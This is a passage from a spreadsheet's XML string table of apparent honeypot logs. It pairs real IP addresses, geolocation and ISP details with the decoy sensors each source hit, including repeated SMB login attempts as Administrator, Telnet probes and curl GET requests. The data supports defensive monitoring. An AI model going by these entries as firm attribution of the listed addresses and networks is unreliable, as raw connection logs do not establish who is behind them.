    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,60894)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,51397)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,52023)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,56859)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,57476)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,54442)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,60455)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,49435)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,50096)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,55448)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,56114)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,61439)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,62095)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,51040)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,51684)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,56993)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,57654)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,62960)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,63581)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,52514)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,53155)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,58443)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,59058)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,64356)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,64976)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,53895)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}&amp;&amp;{Data_SMB:Incoming connection (122.176.65.155,54518)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPAdministrator,WIN-31E8922P57M)}</t>
  </si>
  <si>
    <t>::ffff:7ab0:419b</t>
  </si>
  <si>
    <t>6c2353994c72f2619a6e980e3a96cace</t>
  </si>
  <si>
    <t>91.135.81.109</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>23&amp;&amp;56224</t>
  </si>
  <si>
    <t>099</t>
  </si>
  <si>
    <t>Tukuma novads</t>
  </si>
  <si>
    <t>Tukums</t>
  </si>
  <si>
    <t>454768</t>
  </si>
  <si>
    <t>56.9669</t>
  </si>
  <si>
    <t>23.1543</t>
  </si>
  <si>
    <t>43513</t>
  </si>
  <si>
    <t>Sia Nano IT</t>
  </si>
  <si>
    <t>SIA Infonet Sistemas</t>
  </si>
  <si>
    <t>::ffff:5b87:516d</t>
  </si>
  <si>
    <t>939fe6592c64ca4ea37b9d39ba3cbbd9</t>
  </si>
  <si>
    <t>202.179.91.9</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>23&amp;&amp;22&amp;&amp;46205</t>
  </si>
  <si>
    <t>Bhayandar</t>
  </si>
  <si>
    <t>1276014</t>
  </si>
  <si>
    <t>19.3016</t>
  </si>
  <si>
    <t>72.8511</t>
  </si>
  <si>
    <t>Ankhnet</t>
  </si>
  <si>
    <t>Ankhnet Informations Pvt. Ltd.</t>
  </si>
  <si>
    <t>2007-02-28</t>
  </si>
  <si>
    <t>ANKHNET</t>
  </si>
  <si>
    <t>::ffff:cab3:5b09</t>
  </si>
  <si>
    <t>a12bf0137e086250e205b91be08c7b0f</t>
  </si>
  <si>
    <t>14.169.107.244</t>
  </si>
  <si>
    <t>::ffff:ea9:6bf4</t>
  </si>
  <si>
    <t>426a59042d361ad4d3838038cc262907</t>
  </si>
  <si>
    <t>103.154.81.162</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;34263&amp;&amp;22&amp;&amp;1433&amp;&amp;3306&amp;&amp;50876&amp;&amp;50895&amp;&amp;50956&amp;&amp;51545</t>
  </si>
  <si>
    <t>::ffff:679a:51a2</t>
  </si>
  <si>
    <t>63f967cbfbed538ab8aa0a37cf6aa252</t>
  </si>
  <si>
    <t>59.126.242.72</t>
  </si>
  <si>
    <t>59-126-242-72.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22017&amp;&amp;23&amp;&amp;80&amp;&amp;50359&amp;&amp;50378&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:f248</t>
  </si>
  <si>
    <t>04d71c028e1286b68768d28ad6151bc1</t>
  </si>
  <si>
    <t>114.33.3.24</t>
  </si>
  <si>
    <t>114-33-3-24.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21434&amp;&amp;23&amp;&amp;13604&amp;&amp;80&amp;&amp;17779&amp;&amp;33893&amp;&amp;9100&amp;&amp;22804&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:318</t>
  </si>
  <si>
    <t>29df9c2157f106509e4e254867cac93b</t>
  </si>
  <si>
    <t>117.197.199.158</t>
  </si>
  <si>
    <t>::ffff:75c5:c79e</t>
  </si>
  <si>
    <t>0a50be40b8c978d3ce9683b241c5b40e</t>
  </si>
  <si>
    <t>85.104.120.248</t>
  </si>
  <si>
    <t>Adana</t>
  </si>
  <si>
    <t>325363</t>
  </si>
  <si>
    <t>36.9914</t>
  </si>
  <si>
    <t>35.3308</t>
  </si>
  <si>
    <t>::ffff:5568:78f8</t>
  </si>
  <si>
    <t>aa27b99556cb81350b0d2cb30d68e74f</t>
  </si>
  <si>
    <t>171.103.167.166</t>
  </si>
  <si>
    <t>171-103-167-166.static.asianet.co.th&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;13129&amp;&amp;445</t>
  </si>
  <si>
    <t>Din Daeng</t>
  </si>
  <si>
    <t>6694101</t>
  </si>
  <si>
    <t>13.7967</t>
  </si>
  <si>
    <t>100.574</t>
  </si>
  <si>
    <t>7470</t>
  </si>
  <si>
    <t>TRUE INTERNET CORPORATION CO. LTD.</t>
  </si>
  <si>
    <t>True Internet Co., Ltd.</t>
  </si>
  <si>
    <t>TRUE</t>
  </si>
  <si>
    <t>2011-03-07</t>
  </si>
  <si>
    <t>TRUE-Consumer</t>
  </si>
  <si>
    <t>::ffff:ab67:a7a6</t>
  </si>
  <si>
    <t>84ee512d6c652c485f2f4840c5c8cbe2</t>
  </si>
  <si>
    <t>45.37.11.119</t>
  </si>
  <si>
    <t>syn-045-037-011-119.res.spectrum.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>Johnston</t>
  </si>
  <si>
    <t>Benson</t>
  </si>
  <si>
    <t>4454971</t>
  </si>
  <si>
    <t>27504</t>
  </si>
  <si>
    <t>35.4554</t>
  </si>
  <si>
    <t>-78.5238</t>
  </si>
  <si>
    <t>::ffff:2d25:b77</t>
  </si>
  <si>
    <t>2e03c4caddfdb1a8acea10e82b0b4d1b</t>
  </si>
  <si>
    <t>114.35.78.230</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-78-230.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_REDIS_H1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;32835&amp;&amp;6379&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:4ee6</t>
  </si>
  <si>
    <t>8b68f88411f955b6d09b1793926edfc1</t>
  </si>
  <si>
    <t>115.244.148.162</t>
  </si>
  <si>
    <t>::ffff:73f4:94a2</t>
  </si>
  <si>
    <t>daf18e8f33b94636e6d7f3fe139ea7d9</t>
  </si>
  <si>
    <t>103.169.43.186</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46</t>
  </si>
  <si>
    <t>Kota Gunungsitoli</t>
  </si>
  <si>
    <t>Gunungsitoli</t>
  </si>
  <si>
    <t>1215102</t>
  </si>
  <si>
    <t>1.35993</t>
  </si>
  <si>
    <t>97.5682</t>
  </si>
  <si>
    <t>142345</t>
  </si>
  <si>
    <t>PT Digital Gemilang Solusi</t>
  </si>
  <si>
    <t>DGSNET</t>
  </si>
  <si>
    <t>2021-06-28</t>
  </si>
  <si>
    <t>IDNIC-DGSNET-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,57733)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,58542)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,61593)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,61787)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,51204)}&amp;&amp;{Data_SMB:Incoming connection (103.169.43.186,51770)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67a9:2bba</t>
  </si>
  <si>
    <t>05dc67d410ae672933b007a7e61c3a12</t>
  </si>
  <si>
    <t>59.126.248.195</t>
  </si>
  <si>
    <t>59-126-248-195.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;49269&amp;&amp;23&amp;&amp;80&amp;&amp;10459&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:f8c3</t>
  </si>
  <si>
    <t>43359f7599c96afc4b51f5e20603fdd4</t>
  </si>
  <si>
    <t>219.107.77.111</t>
  </si>
  <si>
    <t>FL1-219-107-77-111.aic.mesh.ad.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>2002-03-07</t>
  </si>
  <si>
    <t>JPNIC-NET-JP</t>
  </si>
  <si>
    <t>::ffff:db6b:4d6f</t>
  </si>
  <si>
    <t>554ed3336c81d68461af36e7b309f8c8</t>
  </si>
  <si>
    <t>118.47.139.99</t>
  </si>
  <si>
    <t>23&amp;&amp;46923</t>
  </si>
  <si>
    <t>::ffff:762f:8b63</t>
  </si>
  <si>
    <t>d42899027f5c6874554b275208d8ad27</t>
  </si>
  <si>
    <t>220.135.36.28</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-36-28.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;38669&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:241c</t>
  </si>
  <si>
    <t>3e4fce6fd2e06c9587bae26604867469</t>
  </si>
  <si>
    <t>154.248.128.156</t>
  </si>
  <si>
    <t>DZ</t>
  </si>
  <si>
    <t>Algeria</t>
  </si>
  <si>
    <t>Algiers</t>
  </si>
  <si>
    <t>Sidi M'hamed</t>
  </si>
  <si>
    <t>Sidi M'Hamed</t>
  </si>
  <si>
    <t>12953187</t>
  </si>
  <si>
    <t>36.7615</t>
  </si>
  <si>
    <t>3.05662</t>
  </si>
  <si>
    <t>36947</t>
  </si>
  <si>
    <t>ALGTEL-AS</t>
  </si>
  <si>
    <t>new</t>
  </si>
  <si>
    <t>::ffff:9af8:809c</t>
  </si>
  <si>
    <t>b5b63e7048a782219915919bca9317ad</t>
  </si>
  <si>
    <t>118.170.196.37</t>
  </si>
  <si>
    <t>118-170-196-37.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:76aa:c425</t>
  </si>
  <si>
    <t>7be21535d7ef305ea8da4f1fc8141390</t>
  </si>
  <si>
    <t>220.133.23.52</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-23-52.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;389&amp;&amp;5900&amp;&amp;53&amp;&amp;6379&amp;&amp;37055&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;18545&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:1734</t>
  </si>
  <si>
